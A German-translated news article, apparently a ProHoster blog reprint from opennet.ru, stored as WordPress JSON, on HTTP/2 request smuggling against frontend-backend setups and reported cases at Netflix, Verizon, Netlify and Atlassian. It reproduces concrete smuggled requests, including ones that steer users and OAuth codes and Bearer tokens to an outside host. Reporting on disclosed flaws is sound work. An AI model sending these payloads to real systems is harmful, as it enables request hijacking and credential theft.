{"id":100934,"date":"2021-08-07T16:22:34","date_gmt":"2021-08-07T14:22:35","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy"},"modified":"2026-02-09T17:18:09","modified_gmt":"2026-02-09T15:18:09","slug":"novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","title":{"rendered":"Ein neuer Angriff auf Frontend-Backend-Systeme, der das Eindringen in Anfragen erm\u00f6glicht.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Websysteme, bei denen das Frontend Verbindungen \u00fcber HTTP\/2 akzeptiert und diese an das Backend \u00fcber HTTP\/1.1 weitergibt, sind anf\u00e4llig f\u00fcr eine neue Variante des Angriffs \u201eHTTP Request Smuggling\u201c. Dieser Angriff erm\u00f6glicht es, durch das Senden speziell gestalteter Kundenanfragen in den Inhalt anderer Benutzeranfragen einzudringen, die im selben Stream zwischen Frontend und Backend verarbeitet werden. Der Angriff kann genutzt werden, um sch\u00e4dlichen JavaScript-Code in eine Sitzung mit einer legitimen Website einzuschleusen, Zugangsbeschr\u00e4nkungssysteme zu umgehen und Authentifizierungsparameter abzufangen.     <\/p>\n<p>Web-Proxies, Lastenausgleichssysteme, Web-Beschleuniger, Content Delivery Networks und andere Konfigurationen, bei denen Anfragen nach dem Frontend-Backend-Schema umgeleitet werden, sind anf\u00e4llig f\u00fcr Probleme. Der Autor der Studie hat gezeigt, dass Angriffe auf Systeme wie Netflix, Verizon, Bitbucket, Netlify CDN und Atlassian m\u00f6glich sind, und erhielt 56.000 US-Dollar f\u00fcr das Auffinden dieser Schwachstellen im Rahmen von Belohnungsprogrammen. Das Vorhandensein des Problems wurde auch in Produkten von F5 Networks best\u00e4tigt. Teilweise betrifft das Problem mod_proxy im Apache HTTP-Server (CVE-2021-33193), wobei die Behebung in Version 2.4.49 erwartet wird (die Entwickler wurden Anfang Mai \u00fcber das Problem informiert und hatten 3 Monate Zeit zur Behebung). Bei nginx wurde die gleichzeitige Angabe der Header \"Content-Length\" und \"Transfer-Encoding\" in der letzten Version (1.21.1) blockiert. Werkzeuge zur Durchf\u00fchrung von Angriffen wurden bereits in das Burp-Toolkit aufgenommen und sind in Form einer Erweiterung namens Turbo Intruder verf\u00fcgbar.      <\/p>\n<p>Der Mechanismus der neuen Methode zur Einspeisung von Anfragen in den Datenverkehr \u00e4hnelt einer Schwachstelle, die vor zwei Jahren von demselben Forscher entdeckt wurde, jedoch nur auf Frontends beschr\u00e4nkt ist, die Anfragen \u00fcber HTTP\/1.1 annehmen. Zur Erinnerung: Im Frontend-Backend-Schema nimmt ein zus\u00e4tzlicher Knoten \u2013 das Frontend \u2013 die Kundenn requests entgegen und stellt eine langlebige TCP-Verbindung zum Backend her, das die Anfragen direkt verarbeitet. \u00dcber diese gemeinsame Verbindung werden normalerweise Anfragen unterschiedlicher Nutzer \u00fcbertragen, die in einer Kette hintereinander erfolgen und durch die HTTP-Protokollmechanismen getrennt werden.     <\/p>\n<p>Der klassische Angriff \"HTTP Request Smuggling\" basierte darauf, dass Frontends und Backends die Verwendung der HTTP-Header \"Content-Length\" (bestimmt die Gesamtgr\u00f6\u00dfe der Daten in der Anfrage) und \"Transfer-Encoding: chunked\" (erm\u00f6glicht die \u00dcbertragung von Daten in Teilen) unterschiedlich interpretieren. Wenn das Frontend beispielsweise nur \"Content-Length\" unterst\u00fctzt, aber \"Transfer-Encoding: chunked\" ignoriert, kann ein Angreifer eine Anfrage senden, die gleichzeitig die Header \"Content-Length\" und \"Transfer-Encoding: chunked\" enth\u00e4lt, wobei die Gr\u00f6\u00dfe in \"Content-Length\" nicht mit der Gr\u00f6\u00dfe der chunked-Kette \u00fcbereinstimmt. In diesem Fall verarbeitet das Frontend die Anfrage und leitet sie gem\u00e4\u00df \"Content-Length\" weiter, w\u00e4hrend das Backend das Ende des Blocks basierend auf \"Transfer-Encoding: chunked\" erwartet, und der verbleibende Teil der Anfrage des Angreifers am Anfang einer anschlie\u00dfenden Anfrage ankommt.         <\/p>\n<p>Im Gegensatz zum textbasierten Protokoll HTTP\/1.1, das zeilenweise analysiert wird, ist HTTP\/2 ein bin\u00e4res Protokoll, das mit Datenbl\u00f6cken fester Gr\u00f6\u00dfe arbeitet. Dabei verwendet HTTP\/2 Pseudo-Header, die normalen HTTP-Headern entsprechen. Bei der Interaktion mit dem Backend \u00fcber das Protokoll HTTP\/1.1 wandelt das Frontend diese Pseudo-Header in entsprechende HTTP\/1.1-Header um. Das Problem besteht darin, dass das Backend bereits auf Basis der vom Frontend bereitgestellten HTTP-Header \u00fcber die Verarbeitung des Streams entscheidet, ohne Informationen \u00fcber die Parameter der urspr\u00fcnglichen Anfrage zu haben.      <\/p>\n<p>Unter anderem k\u00f6nnen die Werte f\u00fcr \u201econtent-length\u201c und \u201etransfer-encoding\u201c in Form von Pseudo-Headern \u00fcbermittelt werden, obwohl sie in HTTP\/2 nicht verwendet werden, da die Gr\u00f6\u00dfe aller Daten in einem separaten Feld bestimmt wird. Dennoch werden diese Header w\u00e4hrend der Umwandlung einer HTTP\/2-Anfrage in HTTP\/1.1 \u00fcbertragen und k\u00f6nnen das Backend irref\u00fchren. Es gibt zwei Hauptangriffsszenarien: H2.TE und H2.CL, bei denen das Backend durch inkorrekte Werte f\u00fcr transfer-encoding oder content-length, die nicht mit der tats\u00e4chlichen Gr\u00f6\u00dfe des an das Frontend \u00fcbermittelten Anfragek\u00f6rpers \u00fcber das HTTP\/2-Protokoll \u00fcbereinstimmen, in die Irre gef\u00fchrt wird.    <center><img decoding=\"async\" alt=\"Ein neuer Angriff auf Frontend-Backend-Systeme, der das Eindringen in Anfragen erm\u00f6glicht.\" src=\"\/wp-content\/uploads\/2021\/08\/1ea8d97902bf7c4281adce29351c96fc.png\" style=\"display:block;margin: 0 auto;\" \/><\/center>      <\/p>\n<p>Ein Beispiel f\u00fcr den Angriff H2.CL ist die Angabe einer falschen Gr\u00f6\u00dfe im Pseudo-Header content-length, w\u00e4hrend eine HTTP\/2-Anfrage an Netflix gesendet wird. Diese Anfrage f\u00fchrt zur Hinzuf\u00fcgung eines \u00e4hnlichen HTTP-Headers Content-Length, wenn eine Anfrage an das Backend \u00fcber HTTP\/1.1 gerichtet wird. Da die Gr\u00f6\u00dfe im Content-Length jedoch kleiner angegeben ist als die tats\u00e4chliche, wird ein Teil der Daten am Ende als Beginn der n\u00e4chsten Anfrage behandelt.     <\/p>\n<p>Zum Beispiel, HTTP\/2 Anfrage:       :method\tPOST     :path\t\/n     :authority\twww.netflix.com     content-length\t4     abcdGET \/n HTTP\/1.1     Host: 02.rs?x.netflix.com     Foo: bar      <\/p>\n<p>Dies f\u00fchrt zu einer Anfrage an das Backend: POST \/n HTTP\/1.1 Host: www.netflix.com Content-Length: 4 abcdGET \/n HTTP\/1.1 Host: 02.rs?x.netflix.com Foo: bar    <\/p>\n<p> Da die Content-Length 4 betr\u00e4gt, wird der Backend nur &#171;abcd&#187; als Anfragek\u00f6rper interpretieren, w\u00e4hrend der Rest &#171;GET \/n HTTP\/1.1&#8230;&#187; als Beginn einer nachfolgenden Anfrage behandelt wird, die an einen anderen Benutzer gebunden ist. Folglich kommt es zu einer Desynchronisierung des Streams, und als Antwort auf die nachfolgende Anfrage wird das Ergebnis der Verarbeitung der gef\u00e4lschten Anfrage ausgegeben. Im Fall von Netflix f\u00fchrte die Angabe eines externen Hosts im Header &#171;Host:&#187; der gef\u00e4lschten Anfrage dazu, dass dem Client die Antwort &#171;Location: https:\/\/02.rs?x.netflix.com\/n&#187; pr\u00e4sentiert wurde, und es erm\u00f6glichte die \u00dcbertragung beliebiger Inhalte an den Client, einschlie\u00dflich der Ausf\u00fchrung von eigenem JavaScript-Code im Kontext der Netflix-Webseite.      <\/p>\n<p>Die zweite Angriffsvariante (H2.TE) bezieht sich auf die Verwendung des Headers &#171;Transfer-Encoding: chunked&#187;. Die Verwendung des Pseudo-Headers transfer-encoding in HTTP\/2 ist gem\u00e4\u00df den Spezifikationen untersagt, und Anfragen mit diesem Header sollten als ung\u00fcltig betrachtet werden. Dennoch ber\u00fccksichtigen einige Implementierungen an den Frontends dieses Erfordernis nicht und erlauben die Nutzung des Pseudo-Headers transfer-encoding in HTTP\/2, der dann in einen entsprechenden HTTP-Header umgewandelt wird. Bei Vorhandensein des Headers &#171;Transfer-Encoding&#187; k\u00f6nnte das Backend diesen als vorrangig erachten und die Daten im &#171;chunked&#187;-Modus aufteilen, wobei unterschiedliche Blockgr\u00f6\u00dfen im Format &#171;{Gr\u00f6\u00dfe}\r\n{Block}\r\n{Gr\u00f6\u00dfe}\r\n{Block}\r\n0&#187; verwendet werden, unabh\u00e4ngig von der urspr\u00fcnglichen Gesamtgr\u00f6\u00dfe.    <\/p>\n<p>Eine solche Sicherheitsl\u00fccke wurde am Beispiel des Unternehmens Verizon demonstriert. Dabei betraf das Problem das Authentifizierungsportal und <a href=\"https:\/\/prohoster.info\/de\/hosting\/hosting-wordpress\/\"  data-wpil-monitor-id=\"1168\">Content-Management-System<\/a>, das auch auf Seiten wie Huffington Post und Engadget verwendet wird. Zum Beispiel eine Anfrage eines Clients \u00fcber HTTP\/2:       :method\tPOST     :path\t\/identitfy\/XUI     :authority\tid.b2b.oath.com     transfer-encoding\tchunked      0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=    <\/p>\n<p>Es wurde ein HTTP\/1.1-Anfrage-Backend-Transfer ausgel\u00f6st:       POST \/identity\/XUI HTTP\/1.1     Host: id.b2b.oath.com     Content-Length: 66     Transfer-Encoding: chunked       0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=      <\/p>\n<p>Der Backend ignorierte den Header \u201eContent-Length\u201c und f\u00fchrte die Stream-Trennung basierend auf \u201eTransfer-Encoding: chunked\u201c durch. In der Praxis erm\u00f6glichte der Angriff die Umleitung von Benutzeranfragen auf ihre eigene Website und das Abfangen von Anfragen, die mit der OAuth-Authentifizierung zusammenhingen, deren Parameter im Referer-Header sichtbar waren. Zudem konnten sie eine Authentifizierungssitzung simulieren und die Benutzerdaten des Systems an den Angreifer senden. GET \/b2blanding\/show\/oops HTTP\/1.1 Host: psres.net Referer: https:\/\/id.b2b.oath.com\/?...&amp;code=secret GET \/ HTTP\/1.1 Host: psres.net Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik...        <\/p>\n<p>F\u00fcr Angriffe auf HTTP\/2-Implementierungen, die keine Angabe des Pseudo-Headers transfer-encoding zulassen, wurde eine weitere Methode vorgeschlagen, die mit der Einschleusung des Headers \u201eTransfer-Encoding\u201c \u00fcber die Verkn\u00fcpfung mit anderen Pseudo-Headern unter Verwendung von Zeilenumbr\u00fcchen verbunden ist (bei der Umwandlung in HTTP\/1.1 entsteht in solchen F\u00e4llen zwei separate HTTP-Header).     <\/p>\n<p>Ein Beispiel f\u00fcr dieses Problem sind Atlassian Jira und Netlify CDN (das f\u00fcr die Bereitstellung der Startseite von Mozilla in Firefox verwendet wird). Insbesondere f\u00fchrt die HTTP\/2-Anfrage :method\tPOST     :path\t\/     :authority\tstart.mozilla.org     foo\tb\r\n     transfer-encoding: chunked     0\r\n     \r\n     GET \/ HTTP\/1.1\r\n     Host: evil-netlify-domain\r\n     Content-Length: 5\r\n     \r\n     x=    <\/p>\n<p>zu einer Anfrage an den Backend-Server mit HTTP\/1.1       POST \/ HTTP\/1.1\r\n     Host: start.mozilla.org\r\n     Foo: b\r\n     Transfer-Encoding: chunked\r\n     Content-Length: 71\r\n     \r\n     0\r\n     \r\n     GET \/ HTTP\/1.1\r\n     Host: evil-netlify-domain\r\n     Content-Length: 5\r\n     \r\n     x=      <\/p>\n<p>Eine weitere M\u00f6glichkeit zur Manipulation des Headers \u201eTransfer-Encoding\u201c bestand darin, ihn an den Namen eines anderen Pseudo-Headers oder an die Methode der Anfrage anzuh\u00e4ngen. Bei der Anfrage an Atlassian Jira f\u00fchrte der Pseudo-Header \u201efoo: bar\r\ntransfer-encoding\u201c mit dem Wert \u201echunked\u201c zur Hinzuf\u00fcgung der HTTP-Header \u201efoo: bar\u201c und \u201etransfer-encoding: chunked\u201c, w\u00e4hrend die Angabe im Pseudo-Header \u201e:method\tGET \/ HTTP\/1.1\r\nTransfer-Encoding: chunked\u201c in \u201eGET \/ HTTP\/1.1\r\ntransfer-encoding: chunked\u201c \u00fcbersetzt wurde.     <\/p>\n<p>Der Forscher, der das Problem identifizierte, schlug au\u00dferdem eine Bedrohungstechnik f\u00fcr die Tunnelung von Anfragen vor, um Angriffe auf Frontends durchzuf\u00fchren, in denen f\u00fcr jede <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/de\/lir\/ipv4\/\"   title=\"IP-Adressen\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"688\">IP-Adressen<\/a> Es wird eine separate Verbindung zum Backend hergestellt, und der Datenverkehr verschiedener Benutzer wird nicht vermischt. Die vorgeschlagene Technik erlaubt es nicht, sich in die Anfragen anderer Benutzer einzuklinken, bietet aber die M\u00f6glichkeit, den gemeinsamen Cache zu manipulieren, was die Verarbeitung anderer Anfragen beeinflusst, und erm\u00f6glicht die Anpassung interner HTTP-Header, die zum \u00dcbertragen von Dienstinformationen vom Frontend zum Backend verwendet werden (zum Beispiel k\u00f6nnen beim Authentifizieren auf der Frontend-Seite Informationen \u00fcber den aktuellen Benutzer in solchen Headers an das Backend \u00fcbermittelt werden). Ein praktisches Beispiel f\u00fcr die Anwendung der Methode ist, dass durch Cache-Manipulation Kontrolle \u00fcber Seiten im Bitbucket-Service erlangt wurde.<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55601\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &#171;HTTP Request Smuggling&#187;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":100935,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100934","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-novosti-interneta"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.10 - aioseo.com -->\n\t<meta name=\"description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.10\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-08-07T14:22:35+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-02-09T15:18:09+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Neue Angriffe auf Frontend-Backend-Systeme, die es erm\u00f6glichen, in Anfragen einzudringen | ProHoster","description":"Websysteme, bei denen das Frontend Verbindungen \u00fcber HTTP\/2 akzeptiert und an das Backend \u00fcber HTTP\/1.1 weitergibt, sind einem neuen Variant der Angriffe \"HTTP Request Smuggling\" ausgesetzt. Dieser Angriff erm\u00f6glicht es, durch das Senden speziell gestalteter Client-Anfragen in die Inhalte anderer Benutzeranfragen einzugreifen, die im selben Strom zwischen Frontend und Backend verarbeitet werden. Der Angriff kann genutzt werden, um schadhafter JavaScript-Code in eine Sitzung mit einem legitimen Benutzer einzuf\u00fcgen.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster","og:description":"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, 